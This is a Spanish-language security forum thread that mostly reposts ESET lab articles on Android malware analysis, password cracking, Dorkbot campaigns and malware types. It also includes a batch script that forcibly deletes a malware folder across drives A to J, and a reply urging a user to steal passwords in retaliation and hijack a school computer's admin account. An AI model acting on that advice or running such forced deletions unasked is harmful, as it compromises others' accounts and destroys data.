En primera instancia, una vez que definimos los objetivos del análisis deberíamos hablar sobre las herramientas que podemos utilizar, donde encontrarlas y como preparar un correcto entorno para el análisis de malware en Android. Para simplificar un poco esta tarea, nos vamos a centrar en una distribución de Linux: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Esta distribución viene especialmente armada para poder analizar códigos maliciosos, buscar vulnerabilidades u otra gran cantidad de tareas en relación a las plataformas móviles, por lo tanto  cuenta con muchas herramientas útiles y efectivas para analizar malware, actualmente la versión disponible es la 0.3 Alpha.

Herramientas como apktool, dex2jar, Droidbox, Androguard son de gran utilidad al momento de analizar un malware para Android. Cada una de ellas tiene distintas funcionalidades, y sumadas a un poco de trabajo el resultado es óptimo. Una aplicación de Android es en realidad un archivo con extensión "You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login", el cual si uno lo intenta abrir de igual manera que a un archivo comprimido ve una estructura como la siguiente:


En el directorio META-INF se encuentran los certificados de la aplicación y otra información acerca de su estructura. La carpeta res contiene los recursos de la aplicación como por ejemplos los iconos, imágenes y otros datos mas que no se encuentran compilados. Luego nos quedan 3 archivos en el directorio raíz,  el archivo resources.arsc contiene todos los recursos pre compilados de la aplicación, classes.dex contiene el código de la aplicación compilado en un el formato que interpreta la maquina virtual de Dalvik y el archivo AndroidManifest.xml es donde se encuentra información acerca de la aplicación como por ejemplo permisos, servicios, receivers y versión de Android con la cual es compatible.

Si extraemos el AndroidManifest.xml e intentamos leer su contenido es posible observar que no se encuentre legible, lo mismo sucede con el archivo classes.dex, para evitar un trabajo engorroso de comprender estos formatos, veremos de que manera llevarlos a un lenguaje mas legible y fácil de entender. Acompanemos el aprendizaje del análisis de malware para Android con un caso real, por lo tanto vamos a analizar el archivo con el MD5: b1ae0d9a2792193bff8c129c80180ab0.

Vamos a utilizar apktool para decodificar el archivo y poder leer su contenido, y de esta manera analizar los permisos que solicita la aplicación para su instalación y ejecución. Es muy importante leer con atención la información provista en el AndroidManifest.xml ya que se pueden identificar características importantes de la aplicación o secciones de su código a las cuales prestar atención a medida que avancemos con el análisis:


Al leer el contenido del archivo se puede identificar su estructura y sus secciones. Dentro de la información que provee este archivo se puede identificar la versión de la aplicación (android:versionCode y android:versionName), en que versiones de Android funciona (android:minSdkVersion) como así también los permisos que requiere para su ejecución. En el caso de la amenaza analizada se puede observar que solicita una gran cantidad de permisos, los cuales debemos analizar en detalle y con el tiempo aprender a identificar cuales son más peligrosos que otros.

Una vez que identifiquemos las principales secciones de la aplicación y los puntos mas importantes llega el momento de analizar el código y ver en detalle cuales son las acciones tomadas en caso de que sucedan los eventos que nos importan. En este momento, es importante entender que es lo que debemos buscar y como hallarlo. Por ejemplo, si se intenta analizar que código se ejecuta cuando llega un mensaje de texto, hay que buscar dentro de la carpeta smali el archivo SecurityReceiver.smali, al abrirlo podemos ver el bytecode de la aplicación y analizar su funcionamiento:


Recapitulemos, al iniciar el análisis de un código malicioso para Android una de las primeras cosas que se deben hacer es entender su estructura, buscar los permisos y para luego investigar en detalle que es lo que hace la aplicación e intentar acceder a su código. Hasta ahora vimos como decompilar el malware con apktool y acceder a los recursos como en AndroidManifest.xml y encontrar el bytecode de la aplicación o de los métodos y clases que queremos analizar, todavía nos queda mucho más por hacer. En la próxima parte veremos la estructura de los componentes mas importantes de una aplicación  y como obtener el código de una manera mas legible, para continuar con el análisis.

Saludos!

Fuente: Laboratorios ESET
Agradecimientos: Pablo Ramos

Recientemente, en una conferencia en Oslo, se demostró que es posible romper contraseñas de 8 caracteres en un período de 5 horas y media.

En una conferencia realizada en Noruega, se presentó un cluster de 25 AMD Radeon con GPU donde mediante la herramienta Hashcat pudo observarse una capacidad de cómputo de 348.000 millones de intentos por segundo sobre contraseñas con hashing NTLM y 63.000 millones de pruebas sobre claves con hashing mediante SHA-1. NTLM es un protocolo de Microsoft que provee autenticación, integridad y seguridad a los usuarios. Asimismo, SHA-1 es una función criptográfica de hashing utilizada en gran medida por aplicaciones y diferentes protocolos.


¿Cómo se realiza el descifrado de la contraseña?

Existen dos mecanismos conocidos que son utilizados para quebrar una contraseña. El primero de ellos es mediante ataques de fuerza bruta y el otro es mediante ataques de diccionario. El ataque de fuerza bruta consiste en probar posibles contraseñas realizando el proceso de hashing sobre cada intento y comparando contra el hashing de referencia (corresponde a la clave que se vulnera). En el caso de ataques de diccionario, se cuenta con tablas previamente computadas con claves comunes o frecuentemente utilizadas. Este tipo de ataque suele ser más rápido ya que no es necesario computar el hashing en cada uno de los intentos y apela a que en muchos casos los usuarios utilizan contraseñas simples.

Debido a que la tecnología de hoy en día es capaz de elevar las tasas de pruebas a valores muy altos, los especialistas en criptografía han diseñado algoritmos de hashing conocidos como "lentos". De esta forma el tiempo del proceso de hashing es mayor y dificulta los ataques a los ciberdelincuentes en los ataques de fuerza bruta. No obstante, el cómputo extra necesario para los algoritmos de hashing "lentos" es casi imperceptible para los usuarios que hagan uso de los mismos. Sin embargo, mediante el sistema antes descripto, se demostró que tienen un gran impacto sobre las técnicas de de fuerza bruta disminuyendo en gran medida el rendimiento. Específicamente, el sistema posee un rendimiento de 77 millones de intentos por segundo sobre md5crypt, 364.000 sobre sha512crypt y apenas 71.000 intentos por segundo sobre bcrypt.

¿Qué se debe hacer?

Es importante comenzar a considerar que es necesario utilizar mecanismos de hashing más complejos. Aquellos servicios que se encuentran en Internet y puedan ser susceptibles a ataques de fuerza bruta deben considerar la utilización de algoritmos de hashing más complejos para disminuir la posibilidad de un ataque exitoso. Sin embargo, en la actualidad, los usuarios deben considerar, en lo posible, la utilización de contraseñas de 10 caracteres o más debido a la capacidad de procesamiento existente. Asimismo, en la medida de lo posible, se deben utilizar diferentes contraseñas para cada servicio que se utilice.

Saludos!

Fuente: Laboratorios ESET
Agradecimientos: Fernando Catoira

Bienvenido, espero que el foro sea de tu agrado y te veamos aportando seguido.

Saludos.

Bienvenido al foro. Me agradaría verte pasar por la sección de seguridad.

Saludos!

1. INF/Autorun
Porcentaje total de detecciones: 4.61%

Es un archivo utilizado para ejecutar y proponer acciones automáticamente cuando un medio externo como un CD, DVD o  dispositivo USB es leído por el equipo informático.

2. HTML/ScrInject.B
Porcentaje total de detecciones: 4.24%

Detección genérica de las páginas web HTML que contiene script ofuscado o etiquetas Iframe que se redireccionan automáticamente a la descarga de malware.

3. Win32/Conficker
Porcentaje total de detecciones: 3.40%

Es un gusano que se propaga utilizando Internet como plataforma de ataque, aprovechando diferentes vulnerabilidades en sistemas operativos Microsoft Windows que ya han sido corregidas, además de otras tecnologías como los dispositivos de almacenamiento removible y recursos compartidos en redes. De esta manera, un atacante puede controlar el sistema de forma remota y realizar acciones maliciosas sin necesidad de utilizar credenciales de usuario válidas.


4. HTML/Iframe.B
Porcentaje total de detecciones: 2.08%

Detección genérica para etiquetas maliciosas Iframe embebidas en páginas HTML, que redirecciona hacia una URL específica con contenido malicioso.

5. Win32/Qhost
Porcentaje total de detecciones: 1.87%

Es un troyano que se copia a sí mismo a la carpeta %system32% de Windows para luego comunicarse bajo DNS con su servidor de comando y control. Win32/Qhost permite que el atacante tome el control del equipo infectado y modifica al archivo host para redireccionar el tráfico a dominios específicos.

6. Win32/Siresef
Porcentaje total de detecciones: 1.62%

Troyano que redirecciona los resultados arrojados por los motores de búsqueda a sitios que contienen adware.

7. Win32/Dorkbot
Porcentaje total de detecciones: 1.51%

Gusano que se propaga a través de medios removibles y contiene un backdoor. Puede ser controlado remotamente. Recolecta usuarios y contraseñas cuando el usuario utiliza ciertos sitios web.

8. JS/TrojanDownloader.Iframe.NKE
Porcentaje total de detecciones: 1.34%

Es un troyano que redirecciona el navegador hacia una URL específica con código malicioso. Usualmente, se encuentra embebido en páginas HTML.

9. JS/Exploit.Pdfka
Porcentaje total de detecciones: 1.25%

Es una detección especialmente diseñada para archivos PDF, que aprovecha la vulnerabilidad CVE-2009-0927. Está escrito en JavaScript. Mediante la explotación de esta vulnerabilidad, un atacante podría ejecutar código arbitrario a distancia en un sistema vulnerable.

10. Win32/Ramnit
Porcentaje total de detecciones: 1.25%

Se trata de un virus que se ejecuta al iniciar el sistema. Infecta archivos .dll y .exe. También busca archivos htm y html para escribir instrucciones maliciosas en ellos. Puede ser controlado remotamente para realizar capturas de pantalla, enviar información de modo encubierto, descargar o ejecutar archivos y apagar o reiniciar el equipo.

Saludos!

Fuente: Laboratorios ESET

La próxima recuerda buscar antes de preguntar.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos!

Hace mas de un año de la salida de Dorkbot y este gusano continúa entre las amenazas con mayor impacto en Latinoamérica. Este código malicioso ha sido detectado en una gran cantidad de campañas de propagación utilizando metodologías de lo más diversas a lo largo de países como México, Perú, Chile y Guatemala entre otros. Las capacidades de Dorkbot, lo han posicionado entre las amenazas favoritas de los cibercriminales. Esta amenaza se propaga a través de dispositivos extraíbles, roba contraseñas de Facebook, Twitter, Gmail, Hotmail, de servidores FTP y además le permite al atacante seleccionar a qué bancos o servicios robar las credenciales de acceso desde los equipos infectados.

Durante las últimas semanas se detectaron nuevos focos de propagación en países como Chile, México y Perú. La información provista por ESET Virus Radar demostró que la distribución en las detecciones de Dorkbot a nivel mundial permanecen estables y América Latina es todavía la región más afectada:


La distribución de las detecciones de Dorkbot a nivel mundial se han mantenido estables desde finales del 2011, momento en el que este gusano llegó a su mayor índice de propagación y se mantuvo durante el último cuatrimestre del año pasado como la amenaza más importante de Latinoamérica. Un análisis de la línea de tiempo de Dorkbot y sus índices de detección demuestra que gusano se ha mantenido estable durante más de un año.


Un análisis minucioso de las estadísticas muestra que el 54% de las detecciones de Dorkbot fueron en Latinoamérica, 25% en Asia mientras que el tercer lugar lo ocupa Europa con el 18%. De esta manera se puede resaltar cómo en América Latina se ha detectado más apariciones de Dorkbot que en todo el resto del mundo, incluyendo las variantes de este gusano que son capaces de propagarse a través de Skype. Otras regiones como África, Norteamérica y Oceanía  tienen menos del 2% de las detecciones. Las técnicas de propagación utlizadas por este código malicioso varían según la región. Sin embargo, las campañas más comunes de propagación incluyen correos falsos, mensajes a través de las redes sociales, páginas web cuya seguridad ha sido vulnerada y diversas técnicas de Ingeniería Social.

Una de las variantes más recientes de este gusano está diseñada para propagarse a través de Skype, enviando mensajes a todos los contactos de la víctima de igual manera que lo hace con Windows Live Messenger, el chat de Facebook o mensajes directos a través de Twitter. La aparición de esta última variante no generó un cambio en los niveles de detecciones como sucedió hace un año atrás.
Como mencionamos anteriormente, las detecciones de Dorkbot se encuentran a lo largo de toda la región de América Latina con México, Perú y Colombia como los tres países mayor niveles de detección. La mayoría de las campañas de propagación utilizan correos falsos promocionando sorteos o regalos que aquellos usuarios engañados descargan e infectan sus sistemas.

Para ejecutar este tipo de ataques los cibercriminales prefieren utilizar servidores vulnerados para alojar sus centros de comando y control (C&C) o para realizar los ataques de phishing. Dorkbot se comunica con su panel de control a través del protocolo IRC, e incluye también soporte para SSL. Sin embargo, cuando los cibercriminales no utilizan esta funcionalidad, es posible capturar todo el tráfico de red de un equipo infectado y ver la comunicación e interacción de Dorkbot con su servidor. Es así como es posible utilizar un sniffer para analizar el tráfico de red y entender de qué manera actúan los delincuentes informáticos.
Las campañas de distribución suelen ser durante un corto período de tiempo, antes de que el atacante decida cambiar el servidor en donde aloja su código malicioso para evitar ser detectado. Durante el análisis de una de las campañas de Dorkbot en México, el atacante almacenaba un listado de la cantidad de descargas que aquellos usuarios afectados hacían de su código malicioso en un archivo de registro.  Debido a esta decisión por parte del atacante fue posible identificar la cantidad de descargas y el número de posibles infectados:


Esta campaña fue detectada durante la última semana de octubre, y según los datos almacenados en el servidor, de un total de 1200 descargas 800 de ellas fueron realizadas por usuarios localizados en México (MD5: ece6f118468dfa974eefcfb816390567).

Una vez que un equipo es infectado se comunicaba con el servidor, no se registró la ejecución de ningún comando por parte de botmaster ni actualizaciones del código malicioso. Sin embargo, todos los equipos infectados reenviaban la información que Dorkbot roba por defecto: credenciales de acceso de más de 40 sitios web diferentes, contraseñas de POP3 (correos electrónicos) y accesos a FTP.

La mayoría de las campañas activas de propagación en Latinoamérica son utilizadas por los cibercriminales para robar información de la banca electrónica de sus víctimas. Para lograr este objetivo, cuando un equipo infectado se comunica con el panel de control descarga un listado de direcciones URL a las cuáles redirige al usuario cuando intenta acceder su home banking:


La lista descargada por esta campaña de propagación contenía un listado con 6 bancos de Chile, a cuyas víctimas le robaban las claves de acceso ya que eran redirigidas a servidores falsos (MD5: f63615c2f8c4b4ed6f8a5ca4cd9b5394 8c0b4b9f80a3c716394371cdf91603ca).

Dorkbot todavía se encuentra muy activo en América Latina y en países como México, Perú, Chile, Guatemala y Ecuador es el código malicioso con el mayor índice de detección.

Saludos!

Fuente: Laboratorios ESET

La información confidencial relacionada con datos críticos de servicios y aplicaciones sobre servidores web se expone cada vez más debido a una deficiente gestión de los administradores. Esto, facilita el acceso de terceros por medio de buscadores web.

Se ha descubierto que a través de búsquedas específicas en Internet, es posible acceder un sinfín de archivos que contienen información confidencial. A continuación puede visualizarse una captura con los resultados de una búsqueda donde se obtienen datos sobre usuarios y contraseñas de diversos sitios en formato XLS (planillas):


En el caso anterior, se obtuvieron resultados que arrojaron archivos en formato XLS que contienen información confidencial, como pueden ser usuarios y contraseñas de servicios, o cualquier otro tipo de dato crítico. Muchos de estos archivos son alojados en servidores web por los propios administradores con la creencia que no serán visibles por terceros. Sin embargo, los buscadores indexan la información de los sitios de forma recursiva quedando pública y accesible a partir de búsquedas con filtros específicos.

Asimismo, existe información confidencial de otra naturaleza y origen que puede ser expuesta. Muchas herramientas utilizadas en servidores web generan reportes u archivos de forma automática que contienen información sensible. A modo de ejemplo, un caso específico puede ser el de ciertas herramientas que trabajan sobre el protocolo FTP (puerto por defecto 21) o el protocolo SSH (puerto por defecto 22), donde es posible visualizar el nombre de usuario y contraseña correspondiente a una gran cantidad de sitios web. A continuación se adjunta una captura con los resultados de una búsqueda específica:


Si se accede a alguno de los resultados, se pueden ver usuarios y contraseñas de acceso de los protocolos:


Es importante que este tipo de información sea contemplada a la hora de utilizar herramientas que dispongan de estas características.

¿Que medidas se pueden tomar para evitar el acceso a información confidencial?

En el caso que se utilicen planillas u otro tipo de archivos con información sensible dentro de un servidor web, en la medida de lo posible, no se debe alojar en directorios del servidor web de forma pública. Distinto es el caso si estos archivos sólo son accesibles por ciertas personas, donde el acceso debe realizarse a través de un mecanismo de validación. Otra alternativa es alojarlo en directorios privados, donde no sean indexados por los crawlers (robots) de los buscadores.

En el caso de los reportes o archivos generados automáticamente por distintas herramientas, se debe tener en cuenta previamente esta característica. Si no es necesario disponer de dichos archivos de reportes, es recomendable desactivar esa funcionalidad para evitar que los mismos queden accesibles por terceros accidentalmente. Si se deben disponer de estos archivos, se debe contemplar que los datos sean guardados en locaciones seguras y no públicas.

Saludos!

Fuente: Laboratorios ESET

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Me alegra que les haya gustado mi código, poco a poco voy aprendiendo lo que pasa ultimamente esque ando en examenes finales y no tengo mucho tiempo para programar así que lo que ando haciendo lo hago en los fines de semana.
El código es muy sencillo, para el 1.0 si es que lo traigo le colocaré una "encriptación" más dificil que digamos y veo si pongo para encriptar en md5, base64, etc; un saludo a todos - "Subzer".

Puedes buscar métodos de encriptación ya existentes y pasarlos a Python. Es decir, hacer que este lenguaje los trabaje y cumpla su función. Esta manera te resultará interesante y tendrás para practicar un rato.

Saludos!

Por empezar, felicitaciones compañero! Me gusta mucho ver como avanzas en este gran lenguaje. Por otro lado, ya has visto mis códigos, supongo que también viste mis códigos de encriptaciones. Podrías usar mas opciones de la función string, como mayúscula, minúscula, o dar vuelta las cadenas.

Espero que tu mente se siga ampliando.

Saludos y suerte!

Excelente aporte ANTRAX. Te felicito, realmente muy útil.

Saludos!

Ya se ha revivido el tema, así que podré responder tranquilamente por el caso en el que llegara a conectarse y ver la respuesta.

Podrías pagar con la misma moneda, robale las contraseñas a ellos. Otra manera, sigue el consejo de ANTRAX. Si no, lee como defenderte de sniffers. O, si tu profesor utiliza algun programa en particular para lograr todo eso, simplemente crea otro usuario, cambia sesión, dale permisos de administrador y elimina la otra cuenta. Seguramente tengan Windows XP, entonces esto sera muy posible.

Saludos!

PD: investiga...

Seguridad

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Detección de códigos maliciosos (Malware)

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Eliminación

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
• You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

Buenas noches a todos.

@echo off
title RECYCLER DELETE && color 0a
set malicius="RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013"
:delete
echo Initializing process... && ping -n 3 localhost >nul
for %%x IN (
"A:", "B:", "C:", "D:", "E:", "F:", "G:", "H:", "I:", "J:"
) DO (
attrib -R -A -S -H "%%~x\%malicius%" && del /S /Q /F "%%~x\%malicius%"
)
REG DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{08B0E5C0-4FCB-11CF-AAX5-90401C608512}" /F
:exist
if not exist "%homedrive%\%malicius%" (echo complete deleted && pause) else (goto:delete)
exit

• Definimos como "malicius" a la carpeta del virus RECYCLER
• Cojemos a las unidades de la A a la J y las colocamos dentro del FOR.
• Realizamos un quitado de atributos y eliminado total a la carpeta del virus en las unidades del FOR
• Eliminamos la clave del registro que ocupaba la amenaza
• Iniciamos una condicion.
• "Si no existe" la carpeta infectada, termina el analizis y cierra. Si existe, vuelve a iniciar el proceso.

Espero que les guste.

Saludos!

Tienes problemas al desinstalar tu Antivirus? Prueba con alguno de estos!

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

---

Esperamos aver solucionado su problema con la desinstalación del antivirus. Si el problema persiste, estaremos encantados de ayudarte.

Si conoces otro desinstalador y deseas compartirlo, no dudes en enviarlo por MP.

Saludos!

Malware es el acrónimo, en inglés, de las palabras "malicious" y "software", es decir software malicioso. Dentro de este grupo se encuentran los virus clásicos (los que ya se conocen desde hace años) y otras nuevas amenazas, que surgieron y evolucionaron, desde el nacimiento de las amenazas informáticas. Como malware, se encuentran diferentes tipos de amenazas, cada una con características particulares. Incluso existe malware que combina diferentes características de cada amenaza. Se puede considerar como malware todo programa con algún fin dañino o que valla contra la confidencialidad de la información.

---

Clasificación del Malware



You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Adware (contracción de ADvertisement - anuncio - y softWARE) es un programa malicioso, que se instala en la computadora sin que el usuario lo note, cuya función es descargar y/o mostrar anuncios publicitarios en la pantalla de la víctima.

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un malware del tipo bot es aquel que está diseñado para armar botnets. Constituyen una de las principales amenazas en la actualidad. Este tipo, apareció de forma masiva a partir del año 2004, aumentando año a año sus tasas de aparición.

Una botnet es una red de equipos infectados por códigos maliciosos, que son controlados por un atacante, disponiendo de sus recursos para que trabajen de forma conjunta y distribuida. Cuando una computadora ha sido afectado por un malware de este tipo, se dice que es un equipo es un robot o zombi.

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

En términos informáticos, los gusanos son en realidad un sub-conjunto de malware. Su principal diferencia con los virus radica en que no necesitan de un archivo anfitrión para seguir vivos. Los gusanos pueden reproducirse utilizando diferentes medios de comunicación como las redes locales o el correo electrónico. El archivo malicioso puede, por ejemplo, copiarse de una carpeta a otra o enviarse a toda la lista de contactos del correo electrónico.

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un hoax (en español: bulo) es un correo electrónico distribuido en formato de cadena, cuyo objetivo es hacer creer a los lectores, que algo falso es real. A diferencia de otras amenazas, como el phishing o el scam; los hoax no poseen fines lucrativos, por lo menos como fin principal.

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

PayLoad es una función adicional que posee cierta amenaza en particular. La traducción exacta del inglés, es más precisa respecto a su definición: "carga útil". Refiere a acciones adicionales, incluidas en virus, gusanos o troyanos; como por ejemplo robo de datos, eliminación de archivos, sobre-escritura del disco, reemplazo del BIOS, etc.

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El phishing consiste en el robo de información personal y/o financiera del usuario, a través de la falsificación de un ente de confianza. De esta forma, el usuario cree ingresar los datos en un sitio de confianza cuando, en realidad, estos son enviados directamente al atacante.

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El ransomware es una de las amenazas informáticas más similares a un ataque sin medios tecnológicos: el secuestro. En su aplicación informatizada, el ransomware es un código malicioso que cifra la información del ordenador e ingresa en él una serie de instrucciones para que el usuario pueda recuperar sus archivos. La víctima, para obtener la contraseña que libera la información, debe pagar al atacante una suma de dinero, según las instrucciones que este disponga.

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Rogue es un software que, simulando ser una aplicación anti-malware (o de seguridad), realiza justamente los efectos contrarios a estas: instalar malware. Por lo general, son ataques que muestran en la pantalla del usuario advertencias llamativas respecto a la existencia de infecciones en el equipo del usuario. La persona, es invitada a descargar una solución o, en algunos casos, a pagar por ella. Los objetivos, según el caso, varían desde instalar malware adicional en el equipo para obtener información confidencial o, directamente, la obtención de dinero a través del ataque.

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Rootkit es una o más herramientas diseñadas para mantener en forma encubierta el control de una computadora. Estas pueden ser programas, archivos, procesos, puertos y cualquier componente lógico que permita al atacante mantener el acceso y el control del sistema.

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Scam es el nombre utilizado para las estafas a través de medios tecnológicos. A partir de la definición de estafa, se define scam como el "delito consistente en provocar un perjuicio patrimonial a alguien mediante engaño y con ánimo de lucro; utilizando como medio la tecnología".

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Se denomina spam al correo electrónico no solicitado enviado masivamente por parte de un tercero. En español, también es identificado como correo no deseado o correo basura. Existen otros tipos de Spam, pero no hablaremos de esos ahora.

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Los spyware o (programas espías) son aplicaciones que recopilan información del usuario, sin el consentimiento de este. El uso más común de estos aplicativos es la obtención de información respecto a los accesos del usuario a Internet y el posterior envío de la información recabada a entes externos.

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El nombre de esta amenaza proviene de la leyenda del caballo de Troya, ya que el objetivo es el de engañar al usuario. Son archivos que simulan ser normales e indefensos, como pueden ser juegos o programas, de forma tal de "tentar" al usuario a ejecutar el archivo. De esta forma, logran instalarse en los sistemas. Una vez ejecutados, parecen realizar tareas inofensivas pero paralelamente realizan otras tareas ocultas en el ordenador.

---

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Un virus es un programa informático creado para producir algún daño en el ordenador y que posee, además, dos características particulares: pretende actuar de forma transparente al usuario y tiene la capacidad de reproducirse a sí mismo.

---

Para más información, dar click en el nombre de la amenaza.

Saludos!

Recopilación de: Laboratorios ESET

Recibimos en el laboratorio un correo falso con una supuesta tarjeta romántica de un afamado sitio de postales digitales. Dentro de esta postal falsa, se adjunta un enlace para su supuesta descarga que dirige a la víctima a un sitio web vulnerado donde se aloja el código malicioso.

El código malicioso se descarga bajo el nombre de "Postal_Intercativa.mov.exe" intentando convencer a la víctima de que, justamente, se trata de una postal animada. A continuación puede visualizarse una captura del correo recibido:


En este caso, el ciberdelincuente utilizó dos sitios vulnerados diferentes para propagar la amenaza. Específicamente, el correo dirige a la víctima al primer sitio vulnerado. En esta instancia, ejecuta un archivo php que realiza una redirección hacia el segundo sitio vulnerado desde donde se descarga el ejecutable malicioso. A continuación se adjunta un diagrama de la secuencia de funcionamiento:


Asimismo, existe un archivo que cuenta la cantidad de descargas del código malicioso. Hasta la fecha corriente, la cantidad de clics indicaba cerca de 3.000 descargas:


Análisis de la muestra

Existen algunos aspectos interesantes que valen la pena resaltar de esté código malicioso en particular. Analizando la muestra, se detectó que se conecta a otro sitio vulnerado para descargar una actualización que, generalmente, incluyen mejoras y nuevas funcionalidades a disposición del ciberdelincuente. En la siguiente captura de tráfico puede visualizarse la descarga del ejecutable que actualiza al código malicioso:


Además, se encontró otro servidor vulnerado en donde se aloja un archivo de texto plano (txt) que es descargado por el código malicioso y utilizado para realizar phishing sobre la víctima. A continuación puede observarse el listado con el mapeo a los servidores falsos:


Dentro de esta lista existen importantes entidades bancarias de Chile, Colombia, Perú y Ecuador. De esa forma, el atacante puede robar información bancaria de víctimas de diferentes países.

Esta es una de las alternativas que utilizan los ciberdelincuentes para seguir propagando este tipo de códigos maliciosos. Ya se ha visto que Dorkbot  utiliza grandes campañas de propagación y de esta forma ha infectado más de 80.000 bots en Latinoamérica.

Saludos!

Fuente: Laboratorios ESET

El servidor web de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login fue vulnerado el día 26 de Noviembre por un atacante. El ciberdelincuente modificó el archivo zip disponible para la descarga por parte de los usuarios correspondiente a la versión 1.9.2, agregando código malicioso en el interior de dicho archivo.

Piwik es una herramienta open source que permite recolectar estadísticas sobre un servidor web. Además posee funcionalidades tales como la generación de reportes detallados sobre los visitantes que recibe un sitio web, realización de campañas de marketing, entre otras.

Aparentemente, y según el propio You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, el atacante habría comprometido el servidor por una vulnerabilidad en un plugin de WordPress.

